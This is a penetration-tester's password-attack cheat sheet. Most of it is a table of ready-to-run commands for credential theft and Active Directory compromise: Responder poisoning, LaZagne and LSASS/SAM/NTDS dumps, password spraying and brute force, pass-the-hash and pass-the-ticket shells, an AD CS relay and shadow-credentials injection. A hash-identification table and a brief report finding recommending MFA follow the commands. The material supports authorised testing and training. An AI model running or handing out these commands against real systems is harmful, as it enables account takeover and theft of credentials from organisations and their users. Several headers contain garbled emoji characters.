π‘οΈ Methodology Checklist
- Identify hash type before cracking:
hashid [HASH]or Hashcat example hashes - John crack:
john --wordlist=[WORDLIST] [HASH_FILE] - Hashcat crack:
hashcat -m [MODE] [HASH_FILE] [WORDLIST] - Custom rules:
john --rules=[RULE] --wordlist=[WORDLIST] [HASH_FILE] - Network spray: check policy β spray with NXC/Kerbrute
- Protected file: convert with
zip2john/keepass2johnthen crack - Archive:
zip2john,rar2johnβ John - Document all cracked credentials with hash and method used
π― Operational Context
Use when: Quick reference for password attack tool selection β match attack type to tool and command. Think Dumber First: Order of operations: default creds β credential stuffing (if breach data available) β spray (1 pass per 30 min) β targeted brute. Never skip to full brute force without trying the targeted approaches first. Skip when: N/A β reference document.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
hashid -j [HASH] | Identify hash type + John format flag |
hashid -m [HASH] | Identify hash type + Hashcat mode ID |
hashcat --help | grep -i "[PROTOCOL]" | Search Hashcat modes by name |
sudo tcpdump -i [IFACE] -v -w capture.pcap | Capture network traffic to file |
sudo tcpdump -i [IFACE] -A | grep -i "pass" --color=auto | Live traffic grep for credentials |
sudo tcpdump -i [IFACE] port 21 or port 23 or port 80 -w capture.pcap | Capture only cleartext protocol ports |
netsh trace start capture=yes tracefile=C:\trace.etl | Windows: start network capture |
netsh trace stop | Windows: stop network capture |
sudo responder -I [IFACE] -v | LLMNR/NBT-NS/mDNS poisoning to capture hashes |
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y | Windows-side hash poisoning (PowerShell) |
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml | Hunt credentials in Windows files |
for l in $(echo ".conf .config .cnf"); do find / -name "*$l" 2>/dev/null | grep -v "lib|fonts|share|core"; done | Hunt config files in Linux |
C:\Temp\lazagne.exe all | Windows: dump all stored credentials |
sudo python2.7 laZagne.py all | Linux: dump all stored credentials |
sudo python3 mimipenguin.py | Linux: dump cleartext creds from memory |
python3 firefox_decrypt.py | Decrypt Firefox saved credentials |
netexec smb [TARGET_IP] -u [USER] -p [PASS] --shares | List SMB shares with valid credentials |
netexec smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --content --pattern "passw" | Spider share for credential keywords |
Snaffler.exe -s | Auto-hunt sensitive files across accessible shares |
netexec smb [SUBNET]/24 -u [USER_LIST] -p '[PASS]' | Password spray across subnet |
hydra -C [CRED_LIST] ssh://[TARGET_IP] | Credential stuffing (-C = user:pass format) |
netexec winrm [TARGET_IP] -u [USER_LIST] -p [PASS_LIST] | WinRM spray β Pwn3d! = admin access |
hydra -L [USER_LIST] -P [PASS_LIST] rdp://[TARGET_IP] -t 4 -W | RDP brute-force (low thread count) |
python3 ssh2john.py [KEY] > ssh.hash && john --wordlist=rockyou.txt ssh.hash | SSH key hash extraction + crack |
zip2john [FILE].zip > zip.hash && john --wordlist=rockyou.txt zip.hash | ZIP hash extraction + crack |
bitlocker2john -i [FILE].vhd | grep "bitlocker\$0" > bl.hash && hashcat -m 22100 bl.hash rockyou.txt | BitLocker extraction + crack |
hashcat -a 0 -m [ID] [HASH] rockyou.txt -r best64.rule | Dictionary + best64 rules |
hashcat -a 3 -m [ID] [HASH] '?u?l?l?l?l?d?s' | Mask attack (known pattern) |
cewl [URL] -d 4 -m 6 --lowercase -w wordlist.txt | Generate targeted wordlist from website |
reg.exe save hklm\sam C:\sam.save && reg.exe save hklm\system C:\system.save && reg.exe save hklm\security C:\security.save | Dump registry hives on target |
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | Extract hashes from hive files offline |
netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --sam | Remote SAM dump |
netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --lsa | Remote LSA secrets dump |
rundll32 comsvcs.dll, MiniDump [PID] C:\lsass.dmp full | LSASS memory dump (elevated) |
pypykatz lsa minidump lsass.dmp | Parse LSASS dump for all credential types |
netexec smb [DC_IP] -u [USER] -p [PASS] -M ntdsutil | Automated NTDS.dit dump |
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL | Decrypt domain hashes from NTDS files |
impacket-psexec [USER]@[TARGET_IP] -hashes :[NT_HASH] | PtH shell via impacket |
evil-winrm -i [TARGET_IP] -u [USER] -H [NT_HASH] | PtH WinRM shell |
Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /rc4:[NT_HASH] /ptt | OverPass-the-Hash β request + inject TGT |
Rubeus.exe ptt /ticket:[FILE].kirbi | Inject Kerberos ticket into session |
export KRB5CCNAME=[FILE].ccache && klist | Linux: activate stolen Kerberos ticket |
impacket-ticketConverter ticket.ccache ticket.kirbi | Convert ticket between Linux/Windows formats |
unshadow passwd.bak shadow.bak > hashes.txt && hashcat -m 1800 hashes.txt rockyou.txt | Linux: unshadow + crack SHA-512 hashes |
kinit [USER]@[DOMAIN] -k -t [FILE].keytab | Linux: impersonate user via keytab |
impacket-ntlmrelayx -t http://[CA_IP]/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication | AD CS relay (ESC8) to mint DC certificate |
python3 gettgtpkinit.py -cert-pfx [FILE].pfx -dc-ip [DC_IP] [DOMAIN]/[USER] /tmp/ticket.ccache | Convert .pfx cert to Kerberos TGT |
pywhisker --dc-ip [DC_IP] -d [DOMAIN] -u [USER] -p [PASS] --target [TARGET] --action add | Shadow credentials injection |
π¬ Deep Dive & Workflow
Decision Tree β What to Attack First
Have a shell?
ββ Local admin β SAM/LSASS/NTDS dump β crack or PtH
ββ Domain user β credential hunting (shares, files, history)
ββ Limited user β credential hunting + privesc first
Have hashes?
ββ NT hash β PtH directly (no crack needed)
ββ Kerberos ticket β PtT
ββ Need plaintext β crack with Hashcat/John
On the network?
ββ Passive β tcpdump, Wireshark filters
ββ Active poisoning β Responder (LLMNR/NBT-NS)
ββ Share hunting β Snaffler, NetExec spider, MANSPIDER
Identify a Hash on Sight
hashid/haiti/hashcat --identify guess from regex and are routinely wrong on ambiguous formats (a bare 32-hex string is NTLM or raw-MD5 or half-LM β the tool canβt know, but where you got it can). Learn to read the hash yourself; the tool is a second opinion, not the answer.
The two patterns that decode most hashes:
$id$...β a Unixcrypt/structured hash. The id names the algorithm:$1$=md5crypt,$5$=sha256crypt,$6$=sha512crypt,$y$=yescrypt,$2a$/$2b$/$2y$=bcrypt (the two digits after are the cost),$krb5tgs$/$krb5asrep$=Kerberos,$keepass$/$office$/$7z$=that file format.- bare hex, no
$β a raw/Windows hash; length is the tell: 16 hex = LM half, 32 = NTLM/MD5, 40 = SHA1.
| Hash | Tell β recognise on sight | Mode | Where found |
|---|---|---|---|
| NT (NTLM) | 32 hex, no prefix | 1000 | SAM, LSASS, NTDS (user:RID:LM:NT:::) |
| Raw MD5 | 32 hex, no prefix (context says web/DB, not Windows) | 0 | app DBs, params |
| Raw SHA1 | 40 hex, no prefix | 100 | app DBs |
| LM | 32 hex; aad3b435b51404ee... = empty half | 3000 | legacy SAM |
| NetNTLMv2 | user::DOMAIN: + two long blobs, has :: | 5600 | Responder / relay capture |
| NetNTLMv1 | user::HOST: shorter, single-block | 5500 | Responder (downgraded) |
| DCC2 (MS Cache 2) | starts $DCC2$10240#user# | 2100 | SECURITY hive |
| DCC (MS Cache) | hash:domain (no $) | 1100 | SECURITY hive |
| Kerberoast TGS (RC4) | $krb5tgs$23$*user$realm$... | 13100 | GetUserSPNs -request |
| Kerberoast TGS (AES256) | $krb5tgs$18$... | 19700 | GetUserSPNs (AES account) |
| AS-REP roast | $krb5asrep$23$user@domain | 18200 | GetNPUsers (no-preauth) |
| md5crypt | $1$salt$... | 500 | old Linux shadow |
| sha256crypt | $5$... | 7400 | Linux shadow |
| sha512crypt | $6$... | 1800 | Linux shadow (common) |
| yescrypt | $y$... | no hashcat mode β John | modern Debian/Ubuntu/Kali shadow |
| bcrypt | $2a$/$2b$/$2y$NN$... (NN = cost) | 3200 | web app DBs |
| KeePass | $keepass$*1*... | 13400 | .kdbx via keepass2john |
| MS Office 2013 | $office$*2013*... | 9600 | docs via office2john |
| 7-Zip | $7z$0$... | 11600 | archives via 7z2john |
| BitLocker | $bitlocker$... | 22100 | VHD/disk via bitlocker2john |
Gotcha: yescrypt (
$y$, the default on current Debian/Ubuntu/Kali) has no hashcat mode β crack it with John the Ripper jumbo, not hashcat. (18200is AS-REP, a common mislabel.)
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Unsure which cracker to use | Multiple options | Use hashcat for GPU cracking; john for CPU/format-auto; not both on same hash |
| Spray lockout triggered | Observation window wrong | Verify policy with --pass-pol first; lockout observation window resets after window expires, not per attempt |
| Default creds list incomplete | Generic list used | Use service-specific defaults: seclists/Passwords/Default-Credentials/ has per-service lists |
| Hash mode unknown | Hash identifier needed | Use: hashcat --identify hash.txt or hash-identifier or haiti hash |
| Attack too slow | CPU/GPU bottleneck | Hashcat GPU required for bcrypt; john βfork=[CORES] for CPU parallelism; prioritize SHA1/MD5 first |
π Reporting Trigger
Finding Title: Password Attack Methodology Applied Across All Identified Services Impact: Systematic password attack methodology covering default credentials, spraying, brute force, and hash cracking provides multiple pathways to valid credentials across all exposed services and user accounts. Root Cause: Absence of MFA, weak password policies, and no anomalous authentication alerting permits methodical password attacks without detection. Recommendation: Implement MFA across all services. Enforce strong password policy (12+ chars, no dictionary words). Alert on failed authentication patterns consistent with spraying. Implement credential breach monitoring.